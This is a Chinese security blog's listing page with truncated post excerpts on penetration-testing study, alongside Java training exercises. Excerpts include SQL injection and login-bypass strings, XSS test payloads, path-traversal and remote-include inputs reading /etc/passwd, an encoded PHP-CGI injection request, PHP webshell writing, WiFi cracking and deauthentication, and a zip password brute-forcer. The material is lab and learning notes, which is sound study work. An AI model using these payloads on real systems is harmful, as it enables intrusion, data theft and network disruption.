f1gure的博客

原创 security+备考经验

经过一个月的艰苦奋斗，终于将security+拿到手，这门考试涉及面颇广，却都点到为止，但是对于了解安全整个行业的涉及面起到很大的作用。经过这次复习备考，我在巩固了渗透基础知识的同时，还掌握了企业中的安全产品实践、企业安全建设管理和密码学的知识，也算是“不虚此行”。下面分享一下我的备考经验，希望对后面的学员起到一些帮助。     首先，每次的直播课最好不要落，在听课前把这节课要上的内容先看一遍...

原创 windows后门

1、打开记事本，输入下列文本：Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\*\shell\runas]@="获取权限""NoWorkingDirectory"=""[HKEY_CLASSES_ROOT\*\shell\runas\command]@="cmd.exe /c takeown /f \"%1\" && i...

原创 kali配置tor

https://www.torproject.org/download/download-easy.html.en#linux    下载tor浏览器解压后打开browser中的start配置文件，将if uid=0语句改为=1打开setup选择配置选择中国对应网桥开始连接配置完毕...

原创 iscc中的一道misc隐写杂项题WP

下载附件发现是个zip，里面还有个flag.txt，打开需要密码，看完题目，猜测是zip伪加密。 Zip文件由压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志构成数据区：目录区：结束标志区：把zip丢进winhex：数据区的全局方式位标记和目录区的全局方式位标记都遭到修改，把它修改回00 00：保存。 Flag.txt直接打开了，发现里面有个字符串：“vfppjrnerpbzva”猜测是...

原创 破解wifi并实施中间人攻击

无线安全小组给的任务，自己搭实验环境完成一下~首先搭建环境，没有路由器就用手机热点装一下嘿嘿，设个密码zxcvbnm4567.     然后用win10主机做受害者，kali虚拟机做攻击者。   首先开始破解wifi，破解wifi呢有很多种方法：1.抓取握手包，用字典穷举破解，玄学破解法，要看字典强度和运气2.如果wifi开启了wps功能，可以穷举pin码的方式破解，成功率很高，但是很费时间！3....

原创 绕waf技巧之sql注入

waf，全名web application firewall，名为web应用防火墙，其实就是市面上的狗、锁、盾、神、宝等等。。可以保护主机、监控流量等。

原创 zip密码爆破脚本-----python3

import zipfilefrom threading import Threaddef extractFile(filename, password): try: filename.extractall(pwd=password.encode('utf-8')) print("密码找到，是："+password) except: ...

原创 玄魂培训第一期ctf题实战

IP：10.9.0.201 先上nmap：PORT  STATE SERVICE22/tcp  open   ssh3306/tcp  open mysql7777/tcp  open cbt8888/tcp  open sun-answerbookMAC Address: 00:FF:18:CA:FB:2E (Unknown)Device type: bridge|general purpose...

原创 源IP隐藏后的寻找方法

        国内网址ip会有cdn服务加速节点混淆源ip。也可能有盾机服务，让虚假ip映射到真实ip上，让你在信息收集阶段得到虚假ip，毫无疑问对渗透造成了很大的影响，列举以下方法找到真实ip:1.大部分cdn服务混淆ip只针对国内上网情况，所以使用国外dns服务器解析网站即可获得真实ip：（附国外dns服务列表：https://www.douban.com/group/topic/70892...

原创 sqlmap使用手册

get方式检查方法：sqlmap -u "网址" post方法检查方法：1.sqlmap -u "网址" --data "post参数=post数据"2.sqlmap -r x.txt   直接根据请求包注入，在请求包里每个消息头最后加*，就是添加对该信息头的注入cookie方式检测方法：sqlmap -u "网址" --cookie "cookie值"不同数据库注入方法：access数据库：判断...

原创 个人渗透测试流程

七个阶段：第一阶段：前期交互阶段1.预估整体项目的时间周期2.确定ip和域名范围第二阶段：情报搜集1.确定版本信息2.出错信息3.端口扫描4.解析DNS服务器5.防御机制识别6.域名信息收集7.反向查询ip，子域名爆破，查找旁注目标第三阶段：危险建模1.分析可用的渗透代码和攻击载荷2.分析社会工程学对象第四阶段：漏洞分析1.web应用扫描器扫描（awvs、w3af、OWASP_ZPA等）2.服务器...

原创 利用esp-8266实现wifi攻击

0x00 前言之前在b站上看到这个wifi模块的攻击视频感觉挺有意思，就在某宝上入了一个拿回来玩玩0x01 外观转接头需要自己另外买0x03 编译程序https://anky.cc/esp8266-deauther-wifi-jammer/这里有教程，我用的是贴吧大神张馆长的固件http://tieba.baidu.com/p/50843537990x04 实验连上充电宝，打开手机wifi，连接设...

原创 sql注入漏洞

基于布尔的检测• 1’ and ‘1’=‘1  /  1’and ‘1 • 1’ and ‘1’=‘2  /  1’and ‘0看查询几个字段：• ‘ order by 9--               (-- )是查询字段联合查询：• ’ union select 1,2--+    看第一个字段和第二个字段名称• ’ union all select database(),2--+Selec...

原创 sql应知应会笔记

原创 python写个端口扫描器

第一天接触socket模块，写个单线程端口扫描器from socket import *def portScan(ip,port):    try:        s=socket(AF_INET,SOCK_STREAM)        result=s.connect_ex((ip,port))        if result==0:            print("%d is open"...

原创 xss漏洞

提交的内容被服务器原封不动的返回，则可能出现漏洞。Xss漏洞分为存储型、反射型、DOM型反射型：检测代码：<script> alert(‘XSS’); </script>    弹出一个警告窗口<a href='' onclick=alert('xss')>type</a>        建立一个点击，点击后弹出警告窗口<img src=htt...

原创 cve-2017-7494复现

首先是靶机配置：开始攻击：成功。

原创 java培训------知识补充

正则表达式：1，RegEx 正则表达式一. 模糊匹配^ .配输入字符串开始的位置。 $ 匹配输入字符串结尾的位置。* 最少出现0次，最多出现N次。+ 最少出现1次，最多出现N次。? 最少出现0次，最多出现1次。\d 匹配数字          ：数字字符匹配。等效于 [0-9]。\D 匹配非数字        ：非数字字符匹配。等效于 [^0-9]。\w 匹配数字+字母     ：匹配任何字类字符...

原创 java培训-----第五天

最后一天，写个万年历，不会打印出来，借鉴下同学的package figure_day4;import java.util.Scanner;public class test01 { public final static int YEAR4 = 365 * 3 + 366; public final static int YEAR = 365; public static void main(St...

原创 java培训-----第四天

今天学爬虫：老师给的下图片的方法package com.kingswim.file;import java.io.BufferedInputStream;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;import ...

原创 java培训-----第三天

homework：定义一“圆”Circle类，圆心为“点”Point类，构造一圆，求圆的周长和面积，并判断某点与圆的关系。定义圆类：public class circle { private point centPoint; private double radius; public final double PI=Math.PI; public circle(point centPoint,do...

原创 java培训-------第二天

数组的定义： public static void main(String[] args) {    // int arr1[] =  {1,2,3,4};  //下标(索引) :[0,n-1] int[]  arr =  {12,45,98};         //第三个元素 int third= arr[2]; System.out.println(third);    //数组的...

原创 java培训--第一天

实现99乘法表：package figure_day1;public class test06 { public static void main(String[] args) { for(int i = 1;i < 10;i++){                      for(int j = 1;j <= i;j++){                      Sys...

转载 信息收集大纲

原创 web目标遍历和文件包含漏洞

配置靶机：     → 重启apache服务：经典测试方法：•?file=../../../../etc/passwd •?page=file:///etc/passwd •?home=main.cgi  •?page=http://www.a.com/1.php •http://1.1.1.1/../../../../dir/file.txt 绕过过滤检测方法部分服务器防御机制：在路径后面添加....

原创 docker安装及使用笔记

docker安装：sudo apt-get updatesudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common# step 2: 安装GPG证书curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg ...

原创 web身份认证漏洞

Session ID的利用：截取目标session ID利用firefox浏览器的tools > cookies manager功能导入IE获取session ID方法：F12开发人员工具>缓存 找回密码理想实验：https://www.example.com/[email protected]&key=b4c9a289323b21a01c3e940f15...

原创 web默认安装漏洞

/phpmyadmin/setupPOST请求漏洞写入静态PHP木马：效果：写入PHP动态木马：（修改3.php）打开nc侦听端口：写入：(成功)Ubuntu/debian默认安装PHP5-cgi：POST/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E %63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%6...

原创 Bursuite工具笔记

Target,proxy模块invisible代理 ：针对多域名对应同一ip或者多ip对应同一域名情况代理https网站需要证书导入 ：proxy ➡️ options ➡️ ca certificate ➡️ certificate in DER formate ➡️ next         保存的证书导入到浏览器中截断服务器返回客户端的数据包 ：proxy➡️Options➡️interce...

原创 skipfish学习笔记

skipfish -o test http://192.168.1.101/dvwa                                对指定网站进行扫描并保存在test文件夹下skipfish -o test @url.txt              对txt文件内的域名进行扫描skipfish -A user:pass -o text  http://192.168.1.

原创 vega使用方法笔记

vega重点关注web application方面的代码漏洞，比如sql注入、跨站等sudo dhclient eth0  给metaspolitable重新获取ip地址 proxy模式：手工扒站 scanner模式：自动扒站  使用上面的useragent阻止浏览器缓存内容：增加流量，提高漏洞发现可能性记录所有请求；显示详细扫描信息编辑扫描模块

原创 nikto使用方法笔记

nikto -update 升级数据库和插件nikto -host 192.168.1.109 -port 80 指定host和端口号扫描nikto -host www.baidu.com -port 443 -ssl 扫描https网站nikto -host hosts.txt 扫描文本文件里的网站nmap -p80 192.168.1.0/24 -oG - | nikto -h

原创 被动信息收集

原创 基本工具使用

原创 基本命令使用

原创 metasploit魔鬼训练营第三天笔记

第一题：实验对象：freebufip：第二题：找到了robots文件：Google到登陆页面：存在sql注入漏洞账号：admin‘OR'1密码：test'OR'1拿到后台管理权限：第三题：可以考虑社会工程攻击第四题：第五题：openva

原创 metasploit魔鬼训练营第二天笔记

下载书中所说的靶机，分配完网络地址用vmware打开后一直黑屏正在寻找解决办法清理磁盘碎片，没用导出为ovf，用vbox打开，没用重新换个资源下载，没用清空winsock，好了！！！啊啊啊啊气死开始配置！！！！！！bt5淘汰啦，把我vbox里的kali拷贝到vmware中：成功导入：配置owasp：配置win2

原创 metasploit魔鬼训练营第一天笔记

实践题第一题时间线：* May 7, 2007: Initial defect disclosure to the security (at) samba (dot) org [email concealed]email alias.* May 7, 2007: Initial developer response by Sambadeveloper Gerald Carter